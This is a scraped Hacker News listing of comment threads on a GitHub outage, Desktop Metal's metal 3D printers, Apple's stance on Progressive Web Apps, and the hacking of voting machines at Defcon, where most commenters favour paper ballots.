I saw a comment earlier mentioning that GitHub allegedly doesn't release post mortems publicly? If this is true, that's upsetting.
loomer 21 hours ago 0 replies      
Anyone have any knowledge of what specifically happened?
ibgib 22 hours ago 1 reply      
Are there any other major sites that are down?
DevKoala 19 hours ago 0 replies      
This is happening too frequently now.
vishesh92 22 hours ago 0 replies      
It just became a major service outage.
Osiris 22 hours ago 0 replies      
It's starting to work again for me. I was able to approve a PR and merge it.
xxkylexx 22 hours ago 1 reply      
Looks like I am still able to push to/pull from my repos without issue.
yellowapple 21 hours ago 0 replies      
My apologies. I knew my Perl 6 wrapper for GLFW was bad, but never realized it'd be so bad that GitHub would choke to death on it.
peterwwillis 22 hours ago 1 reply      
Dang. It's too bad their customers' source control files aren't distributed and decentralized, or they could keep working and ignore this.
macawfish 21 hours ago 0 replies      
Whatever happened to gittorrent?
GrumpyNl 22 hours ago 1 reply      
How does this affects all your dependencies?
tevonsb 22 hours ago 6 replies      
Thoughts on the cause?
adtac 22 hours ago 0 replies      
>GitHub is having a minor service outage

It's definitely not minor.

moomin 22 hours ago 0 replies      
I knew I shouldn't have released the new version of my project yesterday. :p

Sorry everyone

ProAm 22 hours ago 8 replies      
Githubs uptime is pretty bad. Isn't it under 95% for the year now?
__s 22 hours ago 0 replies      
In the face of a lack of information, HN comments begin to throw around unfounded speculation & tongue-in-cheek jokes run rampant. I suppose that in the absence of information, many stay silent, & the remaining see a thread lacking comments

& now we've got this meta one in the mix

0xbear 22 hours ago 3 replies      
How many more can we expect before they develop appreciation for testing _before_ they push to prod?
3D metal printing is about to go mainstream newatlas.com
370 points by phr4ts  1 day ago   156 comments top 35
Animats 20 hours ago 4 replies      
There are many services printing metal parts. Shapeways has been doing it since 2009. There are several workable processes. [1][2] This new machine competes with the ExOne Innovent.[3] That uses a single-step process (no oven needed) but is slower.

Desktop Metal's big claim is that they can lay down "up to" 8200 cm/hr of metal. The "up to" weasel words are a problem. They're vague about the layer thickness. 3D printing has a basic trade-off between speed and precision. Most of the commercial vendors go for high enough precision that you can make working parts. Desktop Metal doesn't offer many pictures of their finished parts, but I did find one.[4] That looks like it was made with layers of about 0.5mm. The furnace step provides some surface smoothing. That's not bad for casting.

It's nice, but it's not clear that it's 100x, or even 10x, better than the competition.

[1] https://www.youtube.com/watch?v=rEfdO4p4SFc[2] https://www.youtube.com/watch?v=2vsaSzrhvcw[3] http://www.exone.com/Systems/Research-Education-Printers/Inn...[4] https://embedwistia-a.akamaihd.net/deliveries/5c8aec78d82aa1...

chroem- 16 hours ago 4 replies      
It's like the brogrammer world just discovered powder metallurgy.

This exact technology has existed for decades but hasn't seen widespread use because it has serious problems. I don't see any evidence that Desktop Metal solved these issues either. The resulting parts have high shrinkage, poor dimensional tolerance, and poor mechanical properties. The sintering process leaves voids inside the material that serve as stress concentrations, causing the material to fail well below its rated strength. Also sintered parts tend to fail catastrophically rather than yielding since the adhesion between particles is much weaker than the yield strength of the metal.

nealrs 32 minutes ago 0 replies      
It's been about 10 years since I left Caterpillar --- but I don't think you can weld (reliably) on PM / sintered parts. This was one of the concerns the crotchety old manufacturing engineers brought up when I proposed replacing some expensive machined bosses with a much cheaper PM part.

Then again, those guys really loved to say stuff like "no, that's not how it's done." - so maybe they're wrong / tech has improved significantly.

ph0rque 22 hours ago 9 replies      
$120k for the prototype printer, $360k for the production printer... still about two orders of magnitude away from being practical for me to set up a microfactory in my garage. Maybe by the time my car is self-driving and earning me money instead of sitting in my garage, I can get that microfactory set up affordably.
coredog64 23 hours ago 3 replies      
> The company has raised a ton of money in the last few months...

> ...Desktop Metal's Studio machines are also a ton more practical to have in an office.

> But there's a ton of metal options...

I'm guilty of this too, but I think there are more ways to describe a plethora of items than "a ton". Unless, of course, there are actually 2000lbs worth.

sevensor 20 hours ago 2 replies      
I don't think they make enough of this point:

> Depending on the nature of the part, it might be necessary to do some post-print surface finishing like sanding or bead blasting to smooth out the layeredsurfaces

If this is anything like the powder-bed parts I've handled, the layers are going to be pretty rough. I wouldn't be surprised if they need some degree of post-machining. Don't sell your CNC mill just yet.

Furthermore, 15% shrinkage during sintering? What's the dimensional tolerance on the finished part then? I'm guessing it's not great.

50something 21 hours ago 1 reply      
This is another Ric Fulop company, notoriously the founder of A123 Systems [1]. That company also raised "a ton" of money but ultimately blew up, filing for bankruptcy. I'm skeptical of this new endeavor because of both economics and technology.

[1] https://en.wikipedia.org/wiki/A123_Systems

simias 17 hours ago 0 replies      
From the video:

The production system is cloud-connected

Seriously, that's a selling point nowadays? I have to buy a hyper expensive piece of hardware and if the company goes under I might not even be able to use it anymore?

Not everything needs to be on a bloody cloud.

1024core 22 hours ago 2 replies      
What is the strength of such a part, compared to a regular cast part? Say I 3-D print a spanner. How well will it hold up against a spanner that was cast and heat treated?
biggerfisch 22 hours ago 1 reply      
> but the only affordable printing materials are cheap ABS plastics

Not very true at all. You can get PLA for $20/1kg or less. Even resin for SLA printers is often possible to find for affordable prices, especially considering that you can sometimes use less material without the need for infill.

I'm really not even sold on the idea that so many people "need" metal printers. Seems like most people would be way better off with the incredibly cheaper plastic options.

WhitneyLand 22 hours ago 0 replies      
Any reason not to set default skepticism to high for Loz Blain and NewAtlas?

>...it's going to compete with traditional mass manufacturing

>...the hype is real

The team, tech, results, deals already signed, all seem really impressive in their own right. No hyperbole needed to get a more views.

It's not my area, if someone tells me this really has a shot at competing with mass manufacturing in the next 5 years I retract everything.

rrggrr 22 hours ago 1 reply      
I'm told the metal powders are still more expensive than equivalent traditional materials, and that in some cases (Ti) can be explosive. Anyone know what the real economics are in terms of materials and energy costs?
kutkloon7 18 hours ago 0 replies      
As a layman, I am skeptical. This is very similar to the promises that were made regarding 3d printing of other materials, and those weren't quite fulfilled.

Like many hyped new techniques, they end up as techniques that are almost good enough to be practical.

WalterBright 18 hours ago 0 replies      
A forging is 3x the strength of a casting of the same part from the same material. That's why when upgrading the power of your muscle car, forged parts are the way to go.

What's the relative strength of 3D printing?

QAPereo 22 hours ago 3 replies      
Other than the temperature a relatively compact oven is potentially reaching, what's the breakthrough here other than the successful funding?
plasticchris 22 hours ago 1 reply      
4 furnaces per printer... reminds me of factorio
Dowwie 21 hours ago 2 replies      
I've watched a few DIY foundry videos on YouTube where makers melt down aluminum cans and scrap metal into chunks of metal, ready for re-use. I wonder if these 3d printers will be able to use reclaimed metal created from a similar type of process.
edanm 18 hours ago 0 replies      
While (potentially) impressive, it's not clear to me that this will really replace production. I mean, it's faster than other printers, but still far away from regular production speeds.
Glyptodon 21 hours ago 1 reply      
Printing with improved PMC (which is what this sounds like) doesn't seem that revolutionary to me... I know there was a Kickstarter a while back for metal-based PMC-like filament to use in regular 3-D printers (for kiln firing later), and I think somebody already makes a device to print using PMC itself. While doing so precisely, strongly, and cleanly enough for mechanical applications, and with a much broader spectrum of metals, is great, the prices seem rather far from the headline hype. (Not that the current options I mentioned don't leave much to be desired.)
achow 22 hours ago 1 reply      
> Each production printer can produce up to an incredible 500 cubic inches of complex parts per hour.

That is 124 iPhone 6 sized solid blocks per hour. Incredible indeed!

zdmc 22 hours ago 1 reply      
In case anyone else was wondering about the power requirement for the sintering furnace: 208V 3-phase, 30A. The 3-phase requirement may be an impediment to some hobbyists; they should probably offer it with a buying option of their own branded inverter.
smnplk 21 hours ago 1 reply      
But could it print a CNC machine ?
alvern 21 hours ago 0 replies      
This may bring the per part costs closer to what prototyping costs come in at for CNC machining or Metal Injection Molding.

I don't see this being used with a lot of exotic materials yet, but for stainless steel this is great.

visarga 22 hours ago 3 replies      
Doesn't oven treatment induce slight deformations?
Iv 13 hours ago 0 replies      
The game will radically change when metal printing arrives at the point where it can print coils and make stators and rotors.

Wake me up when metal printing reaches that point.

tintan 11 hours ago 0 replies      
What advantage does metal printing offer over casting a 3d printed wax/resin?
bandrami 16 hours ago 0 replies      
So, about those good manufacturing jobs...
sharemywin 22 hours ago 2 replies      
How does this compare to a metal CNC machine? Cost and Speed?
pier25 13 hours ago 1 reply      
So now anyone will be able to print a real gun with complete anonymity.
steveklabnik 22 hours ago 0 replies      
I don't know much about how Desktop Metal works; how does this compare to things like ExOne?
jkoll 16 hours ago 0 replies      
Is this an ad?
microcolonel 14 hours ago 0 replies      
The idea of an "office-friendly sintering furnace" would have been comedy a decade ago.
pluio 16 hours ago 0 replies      
nmyk 22 hours ago 0 replies      
Guns for everyone!
HugoDaniel 17 hours ago 0 replies      
Apples refusal to support Progressive Web Apps is a detriment to the web medium.com
370 points by jaffathecake  5 days ago   440 comments top 48
christiangenco 5 days ago 17 replies      
I think a lot of commenters here are missing the point and getting distracted by push notifications (who wants a website spamming them with notifications?) and loading screens (hardly a feature).

Apple supporting PWA (Progressive Web Apps) is hugely important because it enables a future where web apps can natively support browser, Mac/Windows/Linux desktop, and mobile iPhone/Android/Windows native mobile with a single codebase of open technologies.

Why is that important? By fragmenting development effort, the overall product isn't as good on any platform.

There's an app I'm making on the side to keep track of your contacts (like a personal customer management system). This needs to store all your contacts offline, because it'd be too much friction to load everyone you've ever taken notes on over the network every time you open the app.

Right now, the only way for me to accomplish that on iOS is to make a native app. This means I had to learn an entirely new technology stack (React Native and XCode), completely rewrite my views, tie everything into my backend, and go through Apple's Byzantine approval process (which I still haven't done because I can't figure out why my app compiles and runs locally but complains about libraries not being linked when I try to archive it to upload to the app store).

This is unnecessary duplication of work that could've been spent writing new features, makes it harder to add new front-end features in the future (because now they have to be added in two places), and adds a huge lag in the time it takes me to push changes to the iOS client (weeks, vs. the seconds it takes to push a change to the web client).

If apple supported PWA, I would've spent my time making the database keep a local syncing copy on the browser (with minimongo or pouchdb), and then every platform would've benefited from faster page loads and offline syncing.

Until Apple adds PWA support, I can't make as good stuff, and people can't use the better stuff.

jaffathecake 5 days ago 3 replies      
Safari engineers have attended all service worker working group meetings, and they do contribute. However, I do share the frustrations over transparency.

It's tough to get developers to care about things like offline-first, because it's tough for them to convince managers to allow them to spend time on a feature that won't work on iOS (since it won't work in Safari, and Apple has banned other browser engines on their platform).

Ultimately it's users that lose out but also the web as a platform, as it pushes people, like the author of the article, towards walled-garden solutions like native apps.

Apple is looking for service worker use-cases, so if it's something you're interested in, let them know https://lists.webkit.org/pipermail/webkit-dev/2017-July/0292....

pluma 5 days ago 8 replies      
I think push notifications and offline support are the real killer features that Apple currently doesn't support.

It's kind of funny as a web developer because for the longest time Apple seemed to be the one pushing the mobile web forward but now that web apps are reaching for feature parity with native, Apple's initial momentum seems to be ancient history.

It seems Apple still thinks of the mobile web as a content delivery platform rather than an application platform. Their proprietary additions (mostly CSS) largely focused on making things prettier, their rationale for opting out of standard features (e.g. autoplay) often only work under the assumption that the only use for those features would be in the context of traditional content pages.

You want an app? Develop for our walled garden we tightly control to offer our users the best possible experience. If you want it on the web, stick to creating content our users can consume in Mobile Safari, our app for reading websites.

rsynnott 5 days ago 3 replies      
As an iOS user, I'm actually quite glad that websites can't send me push notifications on it. And app loading screens are a feature?

If people _insist_ on making phone apps as websites, there's Cordova and all that. Such apps are never very good, of course. I still haven't seen a website-based desktop/phone app that wasn't a clunky non-native-looking resource-hogging mess.

nothis 5 days ago 3 replies      
IMO convoluted JavaScript hacks aren't the solution to "cross platform development" I'd want to settle on. Do I really want my weather app to be running on top of the browser app? And as far as cross-platform compatibility goes, we're now at a point where websites tell you to please load them with Chrome for the "full experience", that just reminds me of when websites used to tell you to please use Internet Explorer. So much for "Apple mobile Safari is the new Internet Explorer", lol. Push notifications for browsers are a weird concept, anyway.
interpol_p 5 days ago 12 replies      
I hate using web apps. On desktop, mobile, wherever. The author's list of things they want supported by Mobile Safari is just aggravating:

> Here are a list of things you still cant do with mobile safari due to Apples refusal to support them:


> Create an app loading screen

> Use push notifications

> Add offline support

> Create an initial app UI to load instantly

> Prompt installation to the home screen through browser-guided dialog

Why do I want these things, as a user. App loading screens?

I love the web. I love hyperlinks, text and images. The web of connections that lead you to information. Everything in that list is detrimental to a good experience on the web.

I don't want push notifications, I barely enable them for native apps. And it bugs the hell out of me when every second website in desktop Safari prompts to send me push notifications. No. Why would I want this on mobile?

Same thing with the home screen. I love the fact that the address bar in my web browser is my history, my reminders, my bookmarks, my open tabs. I start typing what I want and I'm there. Finding native apps on my home screen is only just getting to the same place with Spotlight, why would I want to make the web worse by sticking icons for pages on my home screen?

And browser-guided dialogs to put more icons on my home screen? Seriously?

This author's post is a great argument against web apps on mobile.

ino 5 days ago 5 replies      
All browsers still suck at basic functionality.

Here's a quick short list of things that developers still have to write because the current implementations are broken, buggy, inconsistent or absent:

- Date pickers.

- Image upload [1].

- Autocomplete and datalist.

- Range pickers.

- Upload time remaining without javascript.

- Number min/max/step, use up/down keys to increment/decrement.

- Form elements that are unable be styled by CSS.

- Color picker (arguably not as important as the others, and some OS color pickers suck anyway).

[1] Basic things like resize image on the browser prior to uploading. Size, aspect ratio, crop could be hinted by the html or chosen by the user. Server check is still needed, but upload size and times would be reduced drastically.

Shouldn't those be more important?

ebbv 5 days ago 0 replies      
Maybe I'm just an old fogey but I don't like Progress Web Apps. I think this whole movement of trying to make web apps more native-like is wrong headed and stems only from developers who have only ever written web apps wanting to write native apps but not wanting to learn how to do it properly.

As a user I don't want to have web apps giving me notifications or having loading screens. I have always liked that the web was tightly sandboxed and limited in what it can do. The nature of the web; where when I follow a link I'm basically installing your application -- sight unseen -- means that what your app can do needs to be tightly controlled and limited.

As a developer, if I want to make a native app for any platform, I'll write a native app. If you don't want to learn Objective-C or Swift, that's fine. There's plenty of ways to write Native applications iOS using cross platform languages like C++.

Frankly, those languages are easier to write testable, dependable code in than JavaScript anyway.

Rjevski 5 days ago 0 replies      
PWAs and any of those Javascript-powered "apps" are shit. I am glad Apple is against them. Even the best JS apps with perfect UX (those are rare, but they exist) still feel relatively slow compared to a native counterpart.

I don't want to pay with UX if some "developers" can't be bothered to learn new languages and insist on doing JS everywhere.

illuminati1911 5 days ago 3 replies      
"all sorts of great features that youd normally associate with native apps, like push notifications, offline support, and app loading screensbut on the web! Awesome."

I didn't know app loading screens were "a great feature".

Anyway I really don't see the point of PWAs or much future for them anyway. Even if Apple started supporting these with Safari, the web apps still could not interact with different hardware components/sensors, iOS SDK's etc.

React Native already brought a platform which allows making apps with native components and good performance with JS + decent access to hardware and iOS and still it's barely used outside of hobby projects.

I'm sorry, but native apps aren't going anywhere.

linopolus 5 days ago 1 reply      
As an iOS user, one thing I surely don't want are more web apps. The web is for content (including APIs Robbe used by native apps) not for apps, if on desktop or mobile. Here's why:

- lower performance. It can't be as fast as native as long as there's still the browser underneath- non-native experience. I use iOS because I like it better than android. I like the UI and UX, how it looks and feels. I don't want an web app, with an UI feeling different, looking different and behaving different.- multi-platform. All platforms will never have the same capabilities and features. You will always have to use the least common denominator or hack your things around.

Apple provides ObjC and Swift, the latter being a terrific way to develop apps, in my humble opinion a far better language and environment than JS (or JS). Just use it, your users will thank you.

VeejayRampay 5 days ago 1 reply      
I'll just recycle a comment from a few days ago, it's (un)surprisingly fitting:

"You know the rule, Apple ALWAYS gets a pass. No matter what they do, no matter how bad they treat their customers, no matter how awful their "upgrades" are, no matter how non-configurable and locked-in their products get over time, no matter the lack of innovation for the past 5 years, they always get a pass. Deal with it, that Jobs residue works its magic for a loooooong time."

cjCamel 5 days ago 0 replies      
This is a frustrating article - the issue really is that Safari doesn't support Service Workers and Web App Manifests, which are the canonical way of making PWAs.

Safari should support Service Workers[1], because they allow you to safely intercept and modify navigation and resource requests, and cache resources in a very granular fashion, securely and on a different thread to your app JS. This is great for performance and offline/spotty reception.

The Web App Manifest[2] is the file that allows developers to "appify" the site, by prompting the user to add to their home screen (only once they hit a certain usage rate), show a splash screen etc. But that's a nice to have compared to Service Workers.

[1]: https://developer.mozilla.org/en/docs/Web/API/Service_Worker...

[2]: https://developer.mozilla.org/en-US/docs/Web/Manifest

waitwutt 5 days ago 0 replies      
What. Having a really hard time following what is exactly preventing the author from doing any of these:

> Create an app loading screen> Use push notifications> Add offline support> Create an initial app UI to load instantly> Prompt installation to the home screen through browser-guided dialog

All of these things are possible in Safari, no? It just doesn't support ServiceWorkers?

Aside: as a web security guy I think serviceworkers are a tragedy. Any crappy site you accidentally visit and immediately hit the back button on gets 10 minutes of freebie time to execute Javascript, roam your local network, exploit "slow" browser vulns, eat your bandwidth, etc. Gone are the days when the only things running Javascript are your open tabs.

jpttsn 5 days ago 1 reply      
OP builds part of this argument based on "Apple isn't responsive to my complaints about web apps."

Apple isn't responsive to complaints in general. Are they less responsive to web app complaints than other complaints? Otherwise, the argument holds no water.

josefwasinski 5 days ago 2 replies      
I can see why apple is hesitant to do this. But there is definitely a middle ground.

Require the same developer registration process as they currently do for iOS apps. Then require some apple provided javascript to provide access to these needed functions. App review as before.

At that point they can do interesting things: charge per 1000 installs, enforce the use of apple pay. They can operate a business model that is slightly different, but the same at its core - tax developers for access to their user base/platform.

programminggeek 5 days ago 0 replies      
I don't think Apple's customers are clamoring for Progressive Web App support as much as they are wanting other features.

The average customer (of which Apple has millions worldwide) wants a device that solves some basic desires like taking pictures, making phone calls, texting, email, etc.

I don't see how this feature serves enough of those customers for Apple to care more about it than something that will sell computers (in some form or another).

quadrangle 5 days ago 0 replies      
When I think "progressive web" I think of progressive enhancement. https://en.wikipedia.org/wiki/Progressive_enhancement i.e. make regular non-JavaScript websites as a foundation and add JavaScript just to enhance that.

I suppose this is a compatible idea, but the PWA idea is based on everything going in the wrong direction generally. PWA aims to make everything "app" like even when it's not warranted. The vast majority of apps and PWAs don't need to exist at all. People don't need all this JavaScript interactive excess.

What I like about PWAs: a move away from everyone downloading ridiculous numbers of apps for each website. What I don't like about PWAs: turning websites into apps when not needed.

jaxondu 5 days ago 0 replies      
As much as I want PWA to rule, web apps still give a noticeable lousy experience than native especially social apps with large feeds (Facebook, Twitter). After so many decades chasing the native experience, it appears HTML/CSS/DOM needs to be revamped/replaced in order for some hope. Maybe a brand new UX library build on top of web assembly? A cross-platform user interface library on top of Unity/Unreal Engine? Why must web apps rely on browser in order to run? If there is a UX component to docker/container, does it provide similar security mechanism as a browser? Maybe this world is not meant to have only one language/UX library/delivery mechanism for apps.
aedron 5 days ago 3 replies      
Since the article did not go into details, and many of the points seem nonsensical, can someone elaborate?

Why can I not "Create an app loading screen" without service workers? Why can I not "Create an initial app UI to load instantly"? Seems these are trivially possible with regular Javascript, but maybe I'm misunderstanding?

Similarly, "Use push notifications", "Add offline support" and "Prompt installation to the home screen" do not sound like APIs that are dependent on service workers, but I guess they are? (or the article makes no sense)

(By the way, the 300ms tap delay that he gripes about can be hacked away, see fastclick.js)

chasing 5 days ago 0 replies      
> Apple thinks you should learn a completely different and more complex programming language (Objective-C/Swift) and maintain a completely separate code base for iOS. This effectively hurts small dev shops, stifles innovation, makes startups much more difficult to get going.

ObjC/Swift may be somewhat more complex than Javascript (or whatever) as programming languages, but one thing I like about iOS development right now is the relatively stable and well-integrated toolset.

I love web development. It's how I got started in all of this. But. The web development world is (in my eyes) currently an over-complex mess of standards and practices and tools coming from twenty different directions and sometimes changing radically from one year to the next. And I have complained before about the fact that Javascript is the primary language for using all of these. (I know, you use XXXScript which transpiles into Javascript. But that kind of adds evidence to my point, no?)

Anyway, this is not a central point to the article linked, but just something that caught my eye.

ivanbakel 5 days ago 0 replies      
>Is this just capitalism? Looking out for their own well being? No. Apple is filthy, filthy rich.

Naive much? People and corporations don't tend to stop collecting wealth - that is, after all, how they became so filthy, filthy rich in the first place.

rimliu 5 days ago 4 replies      
I am starting to get a vibe that there is a new breed of programmers who think that knowing just one language is good enough and learning anything else is "stifling innovation".

I don't even want to start on "PWAs work more seamlessly than native". I just cannot take person making such claims seriously.

millstone 5 days ago 0 replies      
> From now on, I wont be building any more native apps. All my apps going forward will be progressive web apps.

To be sure, the guy who wrote that has never built a native app and knows nothing of native development. That is not actually a story of a native developer being converted by PWAs.

Jyaif 5 days ago 1 reply      
Fundamentally, it's Apple's refusal to allow real 3rd party browsers that is the problem.
Ninn 5 days ago 0 replies      
This is definitely true. But in addition to this, it is insane that it appears that none of the big browsers has begun implementing encrypted storage via touch and so forth.

One of the main arguments i see in my organisation to create apps for our ventures is the fact that it will enable touch login. I recon it should be rather simple to duplicate / wrap the localStorage API to do this?

archie_peach 4 days ago 2 replies      
A lot of people here seem to be advocating the superior experience that native apps provide, but forgetting how saturated the app market is and what a poor job Apple does to help its users discover new apps.

Further, the majority of US smartphone users download zero apps in a typical month. What's the point of making a "superior" app, if no one is ever going to see it?https://qz.com/253618/most-smartphone-users-download-zero-ap...

From a user perspective, I care less about whether the app is a PWA or native, and more about the "goal" I'm trying to achieve. If my goal is to find a new house, a PWA allows me to instantly see results (without first having to download an app), then use native-like features such as being notified when new properties are available. I can use these features after I visit a given website and am prompted to save the app to my homescreen.

Compare this to the random native apps that people accumulate on their phone until it slows down so much that they have to perform an "app purge".

anderber 5 days ago 0 replies      
Wow, I read a lot of hate for PWAs, I had no idea. I use them and enjoy a lot of them (mobile.twitter.com). It really depends on the app, some benefit from being PWA others would need to be native. But the idea that we shouldn't add a feature that Chrome and other browsers have just because you personally don't like push notifications, seems silly.
frusciante19 5 days ago 0 replies      
Well, I would argue the web is a detriment to the web. Apple will never prioritise dev experience to the... detriment of user experience, no matter how many devs tears are shed. The author is arguing for better web developer experience, from what I read.
spo81rty 5 days ago 0 replies      
Apple doesn't want web applications to somehow replace apps in the app store. They make way too much money from their app store. Some of these key features like push notifications are the only reason to even make a native app, for some types of apps.
pavlakoos 5 days ago 0 replies      
So the author of this post is saying a developer with 9 years experience needs 6 months to learn ReactNative?

That doesn't sound encouraging...

dmix 4 days ago 0 replies      

> The apps implementing the standard are called progressive web applications, not to be confused with confusingly similar terms like progressive enhancement or responsive apps.

Front-end moves at the speed of light, I reckon it's hard to come up with original names...

My brain already has to remember thousands of software library names and techniques and argument orders, etc. Not making your label meld into people's brains by being similar to other software names in the SAME niche is a good place to start though.

martijn_himself 5 days ago 0 replies      
I'm not naive and understand the sentiment that part of Apple's motivation behind not supporting these API's on mobile Safari is to protect its App Store ecosystem.

BUT I also believe that Apple cares deeply about quality and its MAIN reason to refuse support is to protect the quality of user experiences on its iOS platform and steer developers to use its native API's which produce vastly superior apps.

It would take Apple years of wasted effort to guarantee similar experiences in the browser.

summadat 5 days ago 1 reply      
"Apple's refusal to support my chosen development platform means that Apple is holding back the entire web" ...really?
nimish 5 days ago 0 replies      
PWA are still inferior to real native apps. The FT's webclip "app" is ass compared to the NYT's nice, native one.
ex3ndr 5 days ago 0 replies      
Why do I need to download 15mb js file for your fancy "offline" web app? Even native apps usually smaller.
jmull 4 days ago 0 replies      
Frankly, it seems like PWA is a solution for web developers looking to deploy LCD, "unnative" apps more widely, more easily.

That's fine for them, but ultimately, I think we've got far too many apps with crappy UIs.

So what's the the real value to the platform and the people who use it for another source of them?

perfectstorm 5 days ago 1 reply      
how good are these PWA ? are there any apps that are already out there on Android ? I'm curious to see how well it perform compared to a native iOS app.
velcro 5 days ago 2 replies      
Officially Apple's reasoning for barring Flash was that web should be pushed forward. Now, almost 8 years later when web is "almost there" - its still hindering real web-app experiences in the iOS browser. Its pretty clear what this was always about.

--(Please lets not do the fanboy "Flash is garbage" here - even if you do feel that it was heating up your CPU with ads - it would have taken a lot less than 8 years to fix that then to reinvent everything and find out that money still makes the world go round.) --

MaxLeiter 4 days ago 0 replies      
Kind of a different use case, but I work on a web-based IRC client (self-hosted IRC cloud) and if Apple support service workers we could have improved offline support, push notifications (for mentions, disconnects, etc), on-device caching of embeds (links and images are embedded in-line), an improved loading screen, and more.
gregblass 4 days ago 0 replies      
Author here. Pretty overwhelmed and astonished with all this. Can't wait to read through all these comments!
shmerl 5 days ago 0 replies      
Apple just need to mess things up for everyone. They wouldn't be Apple otherwise.
Pigo 5 days ago 1 reply      
Can someone explain the difference between progressive web apps and webRTC? Are they related, or completely separate technologies? I just heard about them around the same time, and it seems like they have some things in common.
wuliwong 4 days ago 1 reply      
I'm pretty late to this party, so it probably has already been asked but what specific things need to be supported by mobile Safari to run a PWA?
rezashirazian 4 days ago 0 replies      
I hope this never happens. I despise Javascript.
lurcio 5 days ago 1 reply      
Please.... anything but Active Desktop again
vbezhenar 5 days ago 0 replies      
Apple will do anything to keep control over iOS apps. Web won't allow them to get their 30% margin, so they will do anything to force developers stay in AppStore.
mrkrabo 5 days ago 0 replies      
Google thinking webpages can be as good as native applications is a detriment to the UX.
Hacking Voting Machines at Defcon horner.tj
282 points by maxerickson  1 day ago   224 comments top 21
vowelless 1 day ago 12 replies      
I used to think electronic voting was the logical next step. But now, I think voting is too important to be left to electronics. It should be done on paper.

We trust billions of dollars every day to electronic banking, so why not a vote? Electronic banking comes with many types of federal guarantees to protect against fraud. The government can step in to investigate and prosecute the fraud as well. But there is no such guarantee for the voting to select the government itself!

But it takes so long to aggregate the votes if done with paper ballots. Precisely the point. Electronic voting allows scalable attacks where the number of weak points is dramatically reduced. It is very hard to scale attacks on paper ballots. You would need a coordinated effort in many voting stations to make it work as opposed to hacking a more central electronic system.

That is why I moved from thinking that electronic voting is the logical next step to thinking that we probably need to revert back to paper ballots.

Klathmon 1 day ago 3 replies      
Electronic voting is dangerous and is a very bad idea. Voting should be done on paper, using pencils, put into ballot boxes, and counted by people.

Paper works, and it works well. It's a system that has worked well enough for thousands of years, and we have figured out most of the issues with it during that time. Anyone that can count can validate a single precinct. You can have one person, or 100 people all standing there watching a ballot box all day for tampering. You can have a whole group of people count the results, or just a few.

In a traditional paper system, swaying a single precinct with "blackhat" methods takes a lot of physical resources, a lot of time, and in most cases a lot of people. Then multiply that by every precinct in the country, and it quickly becomes pretty much impossible to do and get away with. Plus it leaves a physical "paper trail" (in the form of payment for people, communications, and physical materials or the receipts for those materials).

Electronic voting gives us very few benefits, and a significant amount of downsides. And it doesn't matter if it's FOSS, it doesn't matter if it's vetted, it doesn't matter what safeguards are put in place, all it takes is one mistake. One fuckup, and someone can now choose the leader of a nation, and in some cases that leader can change the rules of the next election, meaning it only takes one single mistake to ruin it for many many generations in the future.

And replacing a system where literally everyone can validate a system on voting day if they want to with a system where only a fraction of a fraction of people can even read and understand the code, let alone validate the code (and can't actually validate the hardware, or make sure what is running on the hardware is actually that code, or make sure that the hardware is even what it says it is), and it takes a magnitude more time to do so, just isn't a good idea.

cyborgx7 1 day ago 1 reply      
The Chaos Computer Club did some extensive educational work a couple years back to make sure we keep our paper ballots here in Germany. And this work keeps going to this day. I'm very greateful, seeing all the issues we are avoiding because of this, but the fight against misinformed or malicious politicians is still going on.

A very important factor in their work was making sure people called them "voting computers" instead of "voting machines". Most people have a sense by now that computers are hackable and insecure, if only through movies where hackers can hack every system. Calling them machines gives people the sense they are a unhackable mechanical appliances.

iainmerrick 23 hours ago 0 replies      
I think the key problem with electronic voting is the possibility of a "class break", as explained here by Bruce Schneier: https://www.schneier.com/blog/archives/2017/01/class_breaks....

If there's a flaw in the system -- and there will be flaws, the only question is how soon they're found -- there's a risk that the whole thing can be compromised in one fell swoop.

Whereas pen and paper voting, counted by hand, is slower and less accurate and has plenty of its own flaws, but there's no simple way to compromise the entire vote at once. You'd have to fool a whole bunch of different people in different ways, and/or recruit them into a huge conspiracy.

Other countries use pen and paper and it works fine. Electronic voting machines should be banned.

Canada 1 day ago 1 reply      
After more than a decade of security researchers raising the alarm over critical electronic voting machine vulnerability, I hope this finally causes some real demand for verifiable ballots.
tcbawo 1 day ago 1 reply      
I am not a fan of electronic voting as it exists today. But, I expected to see someone advocate a blockchain-like trail to ensure election integrity.

Also, why don't we have automatic voter registration? Let's pay this cost once and move on.

cobookman 1 day ago 1 reply      
I'm for both. Aka you submit your ballot on paper. Have a machine and people both count the vote. If the machine count has a different outcome vs people then you know you've got an issue.

By outcome I mean something like machine had person A winning, people count has person B.

corpMaverick 1 day ago 1 reply      
In my country a losing presidential candidate has been able to convince part of his base that there was electronic fraud using an 'algorithm' even though the whole process was done manually. Imagine if it was really done electronically. That is why I am convinced voting should be done with paper and pencils.
tribby 18 hours ago 0 replies      
I like paper voting but there should be a holiday and the vote should be mandatory even if only to check off "none of the above." The reason I like electronic despite its flaws is someone can do it while on the toilet, and here in the US where there is low turnout and voter suppression, that's about where I want the bar to be.
em3rgent0rdr 17 hours ago 1 reply      
Where is the memory card physically stored? Is that something that a hacker could easily gain access to without being noticed?
elbac 1 day ago 0 replies      
There is an excellent podcast series on the subject of electronic voting, where several experts give their opinions.


After listening, I became convinced that electronic/internet voting is a terrible idea.

alistproducer2 1 day ago 2 replies      
I'm old enough to remember the when e-voting was brought about by the Bush administration. At the time those of us on the far left were convinced that Bush was the American incarnation of Hitler (seems quaint now, doesn't it) and Diebold e-voting machines were going to precipitate the end of democracy.
thrillgore 1 day ago 2 replies      
Put us back on paper ballots. Christ, some systems should be as simple as possible.
em3rgent0rdr 17 hours ago 0 replies      
Voting needs something called "homomorphic encryption", which allows simple arithmetic to be performed on encrypted data without decrypting it.
bdz 1 day ago 0 replies      
I'm more surprised that you can buy voting machines from eBay
jvandonsel 1 day ago 1 reply      
A voting machine with frickin' open USB and Ethernet ports?
UltimateFloofy 1 day ago 0 replies      
Very nice. Voter McVoteyFace deserves an upvote.
miheermunjal 1 day ago 3 replies      
this just re-stresses the point to COMPETITION in the electronic voting space. If you had a monopoly over the systems, what encouragement would you have to upgrade them? There are all sorts of ways to innovate "e-voting", and all of them are objectively improved over the current US methods
lngnmn 1 day ago 0 replies      
One word: Microsoft.
5trokerac3 1 day ago 1 reply      
Depending on how conspiratorially minded you are, being able to exfiltrate/alter voter rolls could be seen as more of a feature than a bug.
dec0dedab0de 1 day ago 7 replies      
